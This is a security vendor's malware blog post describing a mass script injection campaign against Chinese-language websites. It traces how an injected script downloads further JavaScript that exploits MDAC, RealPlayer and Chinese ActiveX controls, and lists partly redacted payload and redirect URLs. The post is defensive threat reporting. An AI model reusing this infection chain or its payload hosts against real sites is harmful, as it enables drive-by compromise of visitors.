Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    April 2014
    S M T W T F S
    « Mar    
     12345
    6789101112
    13141516171819
    20212223242526
    27282930  
  • About Us

    Just a week after half a million Web sites were compromised, here comes another mass Web threat — still no breathing easy for security researchers. Consider the fact that an even earlier SQL injection attack preceded the two we’ve just mentioned (a mere two days before the last attack, and one which also targeted Chinese users) and we have a series of mass compromises in a span of just two weeks.

    This time, we picked up on another script injection attack aimed at Web sites in the Chinese language. Here’s an illustrated summary of this mass compromise:

    Infection Diagram

    A visit to any compromised site would install and execute a malicious script on a system. This said script, which Trend Micro detects as JS_IFRAME.AC, may be downloaded from the remote site http://{BLOCKED}.us/s.js.

    Here is a screenshot of the injected script in one of the compromised sites:

    TW Injected Script

    JS_IFRAME.AC then downloads JS_IFRAME.AD, which exploits several vulnerabilities to further insert scripts in Web sites. TrendLabs Threats Analyst Jonathan San Jose identifies the following exploit routines of JS_IFRAME.AD:

    1. Exploits a vulnerability in Microsoft Data Access Components (MDAC) MS06-14, which allows for remote code execution on an affected system
    2. Uses the import function IERPCtl.IERPCtl.1 or IERPPLUG.DLL to send the shell code to an installed RealPlayer
    3. Checks for GLAVATAR.GLAvatarCtrl.1
    4. Exploits a BaoFeng2 Storm and MPS.StormPlayer.1 ActiveX control buffer overflow
    5. Takes advantage of an ActiveX control buffer overflow in Xunlei Thunder DapPlayer

    Notice that the last two exploits are related to Chinese-language software, suggesting to our researchers that this malicious activity was targeted specifically to China, Taiwan, Singapore, and Hong Kong.

    These vulnerabilities trigger JS_IFRAME.AD to redirect users to one of the following URLs:

    • http://{BLOCKED}and.cn/real11.htm – detected as JS_REALPLAY.AT
    • http://{BLOCKED}and.cn/real.htm – detected as JS_REALPLAY.CE
    • http://{BLOCKED}and.cn/lz.htm – detected as JS_DLOADER.AP
    • http://{BLOCKED}and.cn/bfyy.htm – detected as JS_DLOADER.GXS
    • http://{BLOCKED}and.cn/14.htm – detected as JS_DLOADER.UOW

    JS_IFRAME.AD was found to download the following:

    • VBS_PSYME.CSZ
    • JS_VEEMYFULL.AA
    • JS_LIANZONG.E
    • JS_SENGLOT.D

    These four malware, in turn, download and execute http://{BLOCKED}c.52gol.com/xx.exe, which is detected as TROJ_DLOADER.KQK.

    As of this writing, Google search results show some 327,000 pages that contain the malicious script tag.

    Google Search Results

    Trend Micro Web Threat Protection (WTP) has already blocked access to the said malicious URLs. Users are advised to be cautious when browsing Web sites. Critical software patches, once available from vendors, should be installed to ensure software security.

    Our researchers are still investigating other details regarding this case. More information to be posted as soon as they become available. Trend Micro is also now trying to reach Taiwan CERT to inform them of this mass compromise.

    Consolidated findings of the Research (Taiwan), Escalation, and Threat Response teams at TrendLabs.

    Updated by Mayee Corpin and Jovi Umawing (Technical Communications)





    Share this article
    Get the latest on malware protection from TrendLabs
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   del.icio.us   StumbleUpon






     

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice